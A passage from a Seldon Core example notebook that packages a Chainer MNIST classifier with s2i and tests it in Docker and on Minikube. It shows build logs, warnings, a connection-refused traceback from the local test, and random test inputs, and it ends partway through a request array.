https://files.pythonhosted.org/packages/4a/bd/eee1157fc2d8514970b345d69cb9975dcd1e42cd7e61146ed841f6e68309/typing-3.6.6-py3-none-any.whl\nCollecting typing_extensions<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/62/4f/392a1fa2873e646f5990eb6f956e662d8a235ab474450c72487745f67276/typing_extensions-3.6.6-py3-none-any.whl\nCollecting filelock (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/93/83/71a2ee6158bb9f39a90c0dea1637f81d5eef866e188e1971a1b1ab01a35a/filelock-3.0.12-py3-none-any.whl\nRequirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.16.4)\nCollecting protobuf<3.8.0rc1,>=3.0.0 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/5a/aa/a858df367b464f5e9452e1c538aa47754d467023850c00b000287750fa77/protobuf-3.7.1-cp36-cp36m-manylinux1_x86_64.whl (1.2MB)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.12.0)\nBuilding wheels for collected packages: chainer\nBuilding wheel for chainer (setup.py): started\nBuilding wheel for chainer (setup.py): finished with status 'done'\nStored in directory: /root/.cache/pip/wheels/2e/be/c5/6ee506abcaa4a53106f7d7671bbee8b4e5243bc562a9d32ad1\nSuccessfully built chainer\nInstalling collected packages: typing, typing-extensions, filelock, protobuf, chainer\nFound existing installation: protobuf 3.8.0\nUninstalling protobuf-3.8.0:\nSuccessfully uninstalled protobuf-3.8.0\nSuccessfully installed chainer-6.2.0 filelock-3.0.12 protobuf-3.7.1 typing-3.6.6 typing-extensions-3.6.6\nWARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nWARNING: You are using pip version 19.1, however version 19.2.2 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n" ], [ "!docker run --name \"mnist_predictor\" -d --rm -p 5000:5000 chainer-mnist:0.1", "b03f58f82ca07e25261be34b75be4a0ffbbfa1ad736d3866790682bf0d8202a3\r\n" ] ], [ [ "Send some random features that conform to the contract", "_____no_output_____" ] ], [ [ "!seldon-core-tester contract.json 0.0.0.0 5000 -p", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n----------------------------------------\nSENDING NEW REQUEST:\n\n[[0.997 0.039 0.778 0.59 0.526 0.591 0.659 0.423 0.404 0.302 0.322 0.453\n 0.54 0.852 0.268 0.564 0.163 0.032 0.934 0.317 0.395 0.122 0.056 0.729\n 0.106 0.443 0.334 0.784 0.646 0.296 0.524 0.855 0.503 0.727 0.326 0.491\n 0.385 0.042 0.82 0.715 0.972 0.699 0.431 0.618 0.096 0.849 0.224 0.187\n 0.145 0.357 0.187 0.779 0.009 0.775 0.775 0.584 0.897 0.674 0.01 0.775\n 0.095 0.081 0.089 0.351 0.985 0.878 0.906 0.396 0.499 0.646 0.127 0.966\n 0.087 0.668 0.314 0.853 0.55 0.345 0.95 0.792 0.797 0.037 0.18 0.592\n 0.941 0.662 0.101 0.388 0.902 0.868 0.505 0.824 0.8 0.855 0.568 0.368\n 0.605 0.224 0.214 0.582 0.365 0.44 0.389 0.922 0.028 0.142 0.525 0.843\n 0.706 0.61 0.215 0.962 0.334 0.273 0.365 0.075 0.929 0.693 0.382 0.76\n 0.75 0.403 0.344 0.218 0.831 0.431 0.469 0.527 0.755 0.048 0.407 0.953\n 0.468 0.186 0.589 0.839 0.513 0.307 0.251 0.738 0.173 0.185 0.499 0.797\n 0.264 0.149 0.547 0.699 0.935 0.071 0.145 0.853 0.884 0.195 0.944 0.775\n 0.523 0.627 0.729 0.826 0.894 0.117 0.935 0.363 0.03 0.16 0.435 0.579\n 0.954 0.487 0.133 0.348 0.12 0.741 0.203 0.103 0.334 0.009 0.898 0.597\n 0.375 0.241 0.27 0.094 0.819 0.737 0.147 0.715 0.138 0.801 0.427 0.602\n 0.336 0.796 0.691 0.415 0.329 0.155 0.17 0.152 0.237 0.957 0.298 0.837\n 0.982 0.805 0.972 0.125 0.916 0.101 0.054 0.347 0.566 0.232 0.885 0.864\n 0.049 0.205 0.361 0.767 0.099 0.634 0.359 0.975 0.56 0.289 0.49 0.359\n 0.901 0.39 0.197 0.985 0.141 0.232 0.336 0.932 0.923 0.032 0.126 0.51\n 0.571 0.743 0.831 0.999 0.972 0.649 0.527 0.909 0.071 0.539 0.676 0.851\n 0.104 0.103 0.392 0.641 0.838 0.333 0.453 0.573 0.199 0.924 0.588 0.955\n 0.866 0.085 0.985 0.803 0.386 0.713 0.056 0.972 0.489 0.623 0.108 0.904\n 0.746 0.986 0.824 0.996 0.161 0.738 0.24 0.153 0.935 0.782 0.393 0.098\n 0.449 0.24 0.621 0.293 0.569 0.196 0.893 0.605 0.608 0.114 0.383 0.038\n 0.573 0.373 0.474 0.006 0.292 0.738 0.943 0.65 0.553 0.684 0.3 0.587\n 0.183 0.521 0.211 0.074 0.696 0.672 0.206 0.694 0.129 0.81 0.415 0.56\n 0.994 0.686 0.807 0.514 0.215 0.096 0.295 0.233 0.625 0.663 0.794 0.16\n 0.837 0.194 0.07 0.939 0.965 0.142 0.66 0.152 0.249 0.995 0.892 0.265\n 0.865 0.742 0.19 0.03 0.42 0.807 0.15 0.163 0.529 0.23 0.59 0.676\n 0.121 0.474 0.329 0.383 0.534 0.093 0.861 0.058 0.019 0.212 0.296 0.947\n 0.879 0.445 0.357 0.021 0.551 0.362 0.653 0.258 0.146 0.453 0.373 0.448\n 0.339 0.974 0.266 0.656 0.036 0.698 0.651 0.91 0.438 0.767 0.716 0.267\n 0.871 0.781 0.13 0.912 0.13 0.332 0.647 0.31 0.171 0.323 0.703 0.197\n 0.918 0.803 0.43 0.103 0.606 0.955 0.733 0.902 0.139 0.471 0.994 0.393\n 0.95 0.485 0.782 0.213 0.994 0.206 0.938 0.019 0.429 0.135 0.811 0.209\n 0.991 0.93 0.878 0.742 0.859 0.397 0.128 0.087 0.447 0.392 0.61 0.18\n 0.087 0.641 0.31 0.033 0.211 0.431 0.051 0.639 0.461 0.466 0.171 0.736\n 0.727 0.183 0.542 0.416 0.524 0.251 0.513 0.087 0.395 0.164 0.25 0.384\n 0.705 0.683 0.827 0.188 0.163 0.325 0.256 0.904 0.161 0.334 0.639 0.728\n 0.267 0.463 0.373 0.111 0.585 0.794 0.972 0.281 0.984 0.564 0.671 0.868\n 0.741 0.638 0.702 0.778 0.667 0.372 0.818 0.49 0.102 0.403 0.187 0.283\n 0.492 0.937 0.643 0.657 0.514 0.492 0.042 0.809 0.088 0.018 0.631 0.731\n 0.516 0.625 0.597 0.629 0.798 0.907 0.861 0.439 0.777 0.014 0.771 0.152\n 0.16 0.997 0.699 0.127 0.038 0.503 0.572 0.878 0.901 0.215 0.606 0.686\n 0.847 0.007 0.976 0.895 0.357 0.374 0.989 0.544 0.317 0.043 0.718 0.788\n 0.121 0.432 0.16 0.485 0.553 0.048 0.003 0.375 0.592 0.207 0.853 0.81\n 0.043 0.554 0.084 0.584 0.73 0.766 0.738 0.038 0.56 0.475 0.763 0.002\n 0.382 0.49 0.302 0.873 0.141 0.023 0.341 0.113 0.197 0.948 0.088 0.294\n 0.778 0.807 0.935 0.712 0.466 0.885 0.815 0.843 0.745 0.217 0.664 0.142\n 0.421 0.371 0.536 0.009 0.036 0.352 0.916 0.161 0.345 0.348 0.688 0.806\n 0.434 0.413 0.567 0.043 0.934 0.072 0.54 0.347 0.817 0.321 0.85 0.478\n 0.832 0.899 0.283 0.34 0.304 0.955 0.915 0.934 0.452 0.423 0.75 0.013\n 0.5 0.691 0.854 0.453 0.959 0.843 0.698 0.756 0.918 0.992 0.663 0.608\n 0.756 0.7 0.347 0.427 0.198 0.37 0.837 0.362 0.291 0.126 0.695 0.777\n 0.318 0.88 0.859 0.958 0.075 0.332 0.321 0.179 0.834 0.027 0.332 0.799\n 0.504 0.274 0.819 0.081 0.337 0.02 0.598 0.727 0.159 0.937 0.199 0.639\n 0.063 0.75 0.637 0.686 0.677 0.102 0.135 0.264 0.091 0.837 0.562 0.453\n 0.503 0.884 0.147 0.966 0.118 0.293 0.327 0.859 0.958 0.498 0.369 0.123\n 0.354 0.812 0.163 0.96 0.64 0.596 0.029 0.84 0.159 0.717 0.025 0.394\n 0.185 0.29 0.554 0.646 0.432 0.197 0.668 0.531 0.206 0.599 0.842 0.579\n 0.836 0.889 0.797 0.891 0.1 0.087 0.825 0.952 0.781 0.295 0.819 0.038\n 0.34 0.476 0.08 0.784 0.556 0.282 0.699 0.954 0.5 0.332 0.213 0.618\n 0.92 0.776 0.147 0.749 0.597 0.191 0.957 0.47 0.324 0.352 0.837 0.263\n 0.536 0.48 0.997 0.417 0.08 0.464 0.886 0.019 0.307 0.164 0.36 0.638\n 0.46 0.803 0.139 0.575]]\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 160, in _new_conn\n (self._dns_host, self.port), self.timeout, **extra_kw)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/connection.py\", line 80, in create_connection\n raise err\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/connection.py\", line 70, in create_connection\n sock.connect(sa)\nConnectionRefusedError: [Errno 61] Connection refused\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 603, in urlopen\n chunked=chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 355, in _make_request\n conn.request(method, url, **httplib_request_kw)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1244, in request\n self._send_request(method, url, body, headers, encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1290, in _send_request\n self.endheaders(body, encode_chunked=encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1239, in endheaders\n self._send_output(message_body, encode_chunked=encode_chunked)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 1026, in _send_output\n self.send(msg)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/http/client.py\", line 966, in send\n self.connect()\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 183, in connect\n conn = self._new_conn()\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connection.py\", line 169, in _new_conn\n self, \"Failed to establish a new connection: %s\" % e)\nurllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/adapters.py\", line 449, in send\n timeout=timeout\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/connectionpool.py\", line 641, in urlopen\n _stacktrace=sys.exc_info()[2])\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/urllib3/util/retry.py\", line 399, in increment\n raise MaxRetryError(_pool, url, error or ResponseError(cause))\nurllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='0.0.0.0', port=5000): Max retries exceeded with url: /predict (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused'))\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/bin/seldon-core-tester\", line 10, in <module>\n sys.exit(main())\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/microservice_tester.py\", line 258, in main\n run_predict(args)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/microservice_tester.py\", line 225, in run_predict\n response = sc.microservice(data=batch, transport=transport, method=\"predict\", payload_type=payload_type, names=feature_names)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/seldon_client.py\", line 395, in microservice\n return microservice_api_rest_seldon_message(**k)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/seldon_core/seldon_client.py\", line 534, in microservice_api_rest_seldon_message\n data={\"json\": json.dumps(payload)})\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/api.py\", line 116, in post\n return request('post', url, data=data, json=json, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/api.py\", line 60, in request\n return session.request(method=method, url=url, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/sessions.py\", line 533, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/sessions.py\", line 646, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/requests/adapters.py\", line 516, in send\n raise ConnectionError(e, request=request)\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='0.0.0.0', port=5000): Max retries exceeded with url: /predict (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x1232a2050>: Failed to establish a new connection: [Errno 61] Connection refused'))\n" ], [ "!docker rm mnist_predictor --force", "Error: No such container: mnist_predictor\r\n" ] ], [ [ "# Test using Minikube\n\n**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**", "_____no_output_____" ] ], [ [ "!minikube start --memory 4096 ", "😄 minikube v1.2.0 on darwin (amd64)\n🔥 Creating virtualbox VM (CPUs=2, Memory=4096MB, Disk=20000MB) ...\n🐳 Configuring environment for Kubernetes v1.15.0 on Docker 18.09.6\n🚜 Pulling images ...\n🚀 Launching Kubernetes ... \n⌛ Verifying: apiserver proxy etcd scheduler controller dns\n🏄 Done! kubectl is now configured to use \"minikube\"\n" ] ], [ [ "## Setup Seldon Core\n\nUse the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Install Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).", "_____no_output_____" ] ], [ [ "!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-python3:1.3.0-dev chainer-mnist:0.1", "---> Installing application source...\n---> Installing dependencies ...\nLooking in links: /whl\nCollecting chainer==6.2.0 (from -r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/2c/5a/86c50a0119a560a39d782c4cdd9b72927c090cc2e3f70336e01b19a5f97a/chainer-6.2.0.tar.gz (873kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (41.0.1)\nCollecting typing<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/4a/bd/eee1157fc2d8514970b345d69cb9975dcd1e42cd7e61146ed841f6e68309/typing-3.6.6-py3-none-any.whl\nCollecting typing_extensions<=3.6.6 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/62/4f/392a1fa2873e646f5990eb6f956e662d8a235ab474450c72487745f67276/typing_extensions-3.6.6-py3-none-any.whl\nCollecting filelock (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/93/83/71a2ee6158bb9f39a90c0dea1637f81d5eef866e188e1971a1b1ab01a35a/filelock-3.0.12-py3-none-any.whl\nRequirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.16.4)\nCollecting protobuf<3.8.0rc1,>=3.0.0 (from chainer==6.2.0->-r requirements.txt (line 1))\n WARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nDownloading https://files.pythonhosted.org/packages/5a/aa/a858df367b464f5e9452e1c538aa47754d467023850c00b000287750fa77/protobuf-3.7.1-cp36-cp36m-manylinux1_x86_64.whl (1.2MB)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.6/site-packages (from chainer==6.2.0->-r requirements.txt (line 1)) (1.12.0)\nBuilding wheels for collected packages: chainer\nBuilding wheel for chainer (setup.py): started\nBuilding wheel for chainer (setup.py): finished with status 'done'\nStored in directory: /root/.cache/pip/wheels/2e/be/c5/6ee506abcaa4a53106f7d7671bbee8b4e5243bc562a9d32ad1\nSuccessfully built chainer\nInstalling collected packages: typing, typing-extensions, filelock, protobuf, chainer\nFound existing installation: protobuf 3.8.0\nUninstalling protobuf-3.8.0:\nSuccessfully uninstalled protobuf-3.8.0\nSuccessfully installed chainer-6.2.0 filelock-3.0.12 protobuf-3.7.1 typing-3.6.6 typing-extensions-3.6.6\nWARNING: Url '/whl' is ignored. It is either a non-existing path or lacks a specific scheme.\nWARNING: You are using pip version 19.1, however version 19.2.2 is available.\nYou should consider upgrading via the 'pip install --upgrade pip' command.\nBuild completed successfully\n" ], [ "!kubectl create -f chainer_mnist_deployment.json", "seldondeployment.machinelearning.seldon.io/seldon-deployment-example created\r\n" ], [ "!kubectl rollout status deploy/chainer-mnist-deployment-chainer-mnist-predictor-76478b2", "Waiting for deployment \"chainer-mnist-deployment-chainer-mnist-predictor-76478b2\" rollout to finish: 0 of 1 updated replicas are available...\ndeployment \"chainer-mnist-deployment-chainer-mnist-predictor-76478b2\" successfully rolled out\n" ], [ "!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \\\n seldon-deployment-example --namespace default -p", "/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:516: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:517: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:518: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:519: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:520: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint8 = np.dtype([(\"qint8\", np.int8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint8 = np.dtype([(\"quint8\", np.uint8, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint16 = np.dtype([(\"qint16\", np.int16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_quint16 = np.dtype([(\"quint16\", np.uint16, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n _np_qint32 = np.dtype([(\"qint32\", np.int32, 1)])\n/Users/dtaniwaki/.pyenv/versions/3.7.4/lib/python3.7/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.\n np_resource = np.dtype([(\"resource\", np.ubyte, 1)])\n----------------------------------------\nSENDING NEW REQUEST:\n\n[[0.64 0.213 0.028 0.604 0.586 0.076 0.629 0.568 0.806 0.931 0.266 0.098\n 0.526 0.336 0.569 0.965 0.157 0.401 0.15 0.405 0.594 0.21 0.699 0.085\n 0.314 0.467 0.303 0.384 0.788 0.135 0.349 0.467 0.025 0.525 0.767 0.819\n 0.275 0.212 0.784 0.448 0.808 0.582 0.939 0.165 0.761 0.272 0.332 0.321\n 0.005 0.921 0.285 0.181 0.161 0.948 0.148 0.788 0.664 0.65 0.795 0.548\n 0.754 0.407 0.057 0.429 0.569 0.538 0.295 0.4 0.581 0.569 0.299 0.066\n 0.456 0.118 0.983 0.93 0.316 0.865 0.492 0.048 0.505 0.573 0.595 0.13\n 0.595 0.595 0.474 0.334 0.708 0.25 0.183 0.391 0.268 0.252 0.366 0.029\n 0.676 0.869 0.12 0.737 0.502 0.868 0.846 0.891 0.578 0.598 0.984 0.543\n 0.515 0.081 0.998 0.976 0.611 0.492 0.494 0.985 0.443 0.246 0.252 0.871\n 0.615 0.885 0.903 0.254 0.651 0.412 0.645 0.608 0.921 0.5 0.18 0.845\n 0.91 0.601 0.782 0.27 0.643 0.671 0.273 0.37 0.454 0.08 0.854 0.439\n 0.912 0.709 0.703 0.817 0.381 0.963 0.057 0.015 0.126 0.686 0.284 0.463\n 0.231 0.332 0.932 0.804 0.538 0.039 0.12 0.992 0.436 0.791 0.261 0.842\n 0.901 0.208 0.578 0.423 0.657 0.293 0.633 0.45 0.609 0.715 0.149 0.244\n 0.026 0.332 0.525 0.157 0.749 0.88 0.713 0.405 0.473 0.01 0.038 0.807\n 0.934 0.157 0.141 0.155 0.124 0.781 0.738 0.018 0.42 0.635 0.867 0.925\n 0.398 0.505 0.695 0.429 0.174 0.327 0.123 0.967 0.378 0.224 0.393 0.053\n 0.344 0.731 0.02 0.848 0.079 0.814 0.023 0.087 0.578 0.642 0.18 0.563\n 0.276 0.491 0.021 0.719 0.85 0.156 0.031 0.506 0.271 0.095 0.186 0.002\n 0.799 0.138 0.734 0.925 0.881 0.187 0.559 0.946 0.826 0.488 0.744 0.322\n 0.333 0.322 0.665 0.032 0.663 0.754 0.495 0.569 0.917 0.167 0.168 0.409\n 0.369 0.363 0.23 0.961 0.201 0.463 0.565 0.834 0.431 0.848 0.742 0.436\n 0.061 0.656 0.3 0.128 0.485 0.78 0.617 0.082 0.396 0.416 0.673 0.961\n 0.727 0.986 0.222 0.909 0.898 0.144 0.639 0.046 0.101 0.546 0.782 0.069\n 0.672 0.824 0.861 0.981 0.003 0.591 0.303 0.384 0.67 0.7 0.834 0.475\n 0.932 0.949 0.938 0.945 0.368 0.522 0.833 0.045 0.452 0.068 0.165 0.569\n 0.44 0.702 0.727 0.069 0.686 0.262 0.891 0.547 